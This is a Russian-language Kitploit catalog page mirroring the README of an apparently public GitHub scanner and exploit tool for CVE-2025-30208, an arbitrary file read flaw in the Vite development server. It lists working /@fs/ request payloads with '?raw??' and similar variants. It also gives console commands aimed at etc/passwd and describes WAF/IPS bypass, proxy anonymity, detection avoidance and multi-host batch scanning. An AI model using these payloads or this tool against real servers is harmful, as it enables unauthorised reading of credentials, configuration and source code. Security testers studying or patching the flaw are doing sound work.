Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 — это уязвимость произвольного чтения файлов средней степени опасности в сервере разработки Vite (популярный инструмент сборки фронтенда). | Kitploit
Инструменты/GitHubGitHub/themehackers/cve-2025-30208
Сканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubthemehackers/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 — это уязвимость произвольного чтения файлов средней степени опасности в сервере разработки Vite (популярный инструмент сборки фронтенда).

Репозиторий
10141 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔥 CVE-2025-30208 Vite — Сканер уязвимости произвольного чтения файлов

Python License Security Status Modular

Продвинутый сканер уязвимости CVE-2025-30208 с функциями корпоративного уровня

Профессиональный инструмент для тестирования на проникновение для обнаружения уязвимости произвольного чтения файлов Vite

🚀 Быстрый старт • 📋 Особенности • 🔧 Использование • 📊 Примеры • 🛡️ Безопасность


📖 Обзор

Это комплексный сканер уязвимостей, предназначенный для обнаружения и эксплуатации уязвимости CVE-2025-30208 на серверах разработки Vite. Уязвимость позволяет произвольное чтение файлов через конечные точки файловой системы Vite, потенциально раскрывая конфиденциальные файлы конфигурации, исходный код и системную информацию.

🎯 Что делает этот инструмент

  • Обнаруживает уязвимые экземпляры Vite в сети
  • Эксплуатирует уязвимость произвольного чтения файлов безопасно
  • Находит конфиденциальные файлы и данные конфигурации
  • Сообщает результаты в нескольких форматах (HTML, JSON, консоль)
  • Управляет сеансами сканирования и конфигурациями
  • Обрабатывает ошибки корректно с механизмами автоматического повтора

🏗️ Модульная архитектура

Инструмент теперь имеет модульную архитектуру для лучшей поддерживаемости и расширяемости:

  • CVE-2025-30208.py — Основное приложение сканера
  • payloads.py — Продвинутые полезные нагрузки для эксплуатации (60+ вариаций)
  • sensitive_files.py — Комплексная база конфиденциальных файлов (200+ файлов)
  • html_template.py — Улучшенный шаблон HTML-отчёта в стиле хакера

🚀 Быстрый старт

Предварительные требования

pip3 install -r requirements.txt

Базовое использование

python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Особенности

🔍 Основное обнаружение уязвимостей

  • 60+ продвинутых полезных нагрузок: Комплексные методы эксплуатации для максимального обнаружения
  • Умное обнаружение: Интеллектуальный анализ ответов для избежания ложных срабатываний
  • Валидация в реальном времени: Непрерывная проверка ответов цели
  • Комплексное тестирование: Проверка всех известных уязвимых конечных точек

🛡️ Расширенные функции безопасности

  • Поддержка прокси: Настройка HTTP/HTTPS прокси для анонимности
  • Пользовательские заголовки: Обход WAF/IPS с помощью пользовательских HTTP-заголовков
  • Ограничение скорости: Настраиваемые задержки для избежания обнаружения
  • Управление сеансами: Сохранение и восстановление сеансов сканирования
  • Валидация ввода: Комплексная проверка параметров

🔧 Продвинутые возможности

  • Пакетное сканирование: Многопоточное сканирование нескольких целей
  • Обнаружение конфиденциальных файлов: Автоматическое обнаружение более 200 конфиденциальных файлов
  • Тестирование подключения: Тестирование протоколов TCP/UDP/HTTP/HTTPS
  • Восстановление после ошибок: Автоматический повтор с экспоненциальной задержкой
  • Комплексное логирование: Детальные журналы с временными метками

📊 Отчёты и вывод

  • 🎨 Улучшенные HTML-отчёты: Красивые отчёты об уязвимостях в стиле хакера с анимацией
  • Экспорт в JSON: Структурированные данные для дальнейшего анализа
  • Вывод в консоль: Цветная обратная связь в реальном времени
  • Файлы журналов: Детальные аудиторские следы
  • Интерактивный веб-интерфейс: Встроенный веб-сервер для просмотра отчётов

🔧 Руководство по использованию

1. Базовая конфигурация

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Тестирование уязвимости

CVE-2025-30208 > run

# Включить подробный режим для детального вывода
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Пакетное сканирование

CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Нажмите Enter дважды для завершения]

4. Обнаружение конфиденциальных файлов

CVE-2025-30208 > scan

5. Продвинутая конфигурация

# Настройка прокси
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Установка пользовательских заголовков
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Настройка ограничения скорости
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Улучшенное HTML-отчётность

# Создать красивый HTML-отчёт
CVE-2025-30208 > pull

# Запустить веб-сервер для просмотра отчёта
CVE-2025-30208 > web

# Запустить веб-сервер на определённом порту
CVE-2025-30208 > web 8081

# Остановить веб-сервер
CVE-2025-30208 > web off

📊 Справочник команд

КомандаОписаниеПример
set <опция> <значение>Установить параметры конфигурацииset RHOST 192.168.1.100
show optionsПоказать текущие настройкиshow options
editИнтерактивный редактор опцийedit
run / exploitЗапустить тест на уязвимостьrun
batchПакетное сканирование нескольких целейbatch
scanОбнаружить конфиденциальные файлыscan
pullЭкспортировать результаты в HTML/JSONpull
web [on|off|port]Веб-сервер для HTML-отчётовweb 8080
saveСохранить конфигурацию сеансаsave
loadЗагрузить конфигурацию сеансаload
testПроверить подключение к целиtest
validateПроверить текущую конфигурациюvalidate
verboseПереключить подробный режимverbose
proxyНастроить параметры проксиproxy
headersУстановить пользовательские HTTP-заголовкиheaders
rateНастроить ограничение скоростиrate
logПоказать информацию журналаlog
help / ?Показать справкуhelp
exit / quitВыйти из инструментаexit

⚙️ Параметры конфигурации

ОпцияОписаниеПо умолчаниюВалидация
RHOSTЦелевой хост/IP-адрес-Валидация имени хоста/IP
RPORTНомер порта цели-Диапазон портов (1-65535)
FILEPATHПуть к файлу для тестированияetc/passwdВалидация пути
PROXYURL HTTP/HTTPS прокси-Валидация формата URL
VERBOSEВключить подробный выводfalseЛогическая валидация
RATE_LIMITЗадержка между запросами (секунды)0.3Числовая валидация
THREADSКоличество потоков для пакетного сканирования5Целочисленная валидация
TIMEOUTТайм-аут запроса (секунды)5Целочисленная валидация
CUSTOM_HEADERSПользовательские HTTP-заголовки (JSON){}Валидация формата JSON

🎨 Улучшенная система полезных нагрузок

Теперь сканер использует более 60 различных вариаций полезных нагрузок, организованных в payloads.py:

Основные полезные нагрузки @fs

/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

Расширенные вариации параметров

/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
Скачать инструмент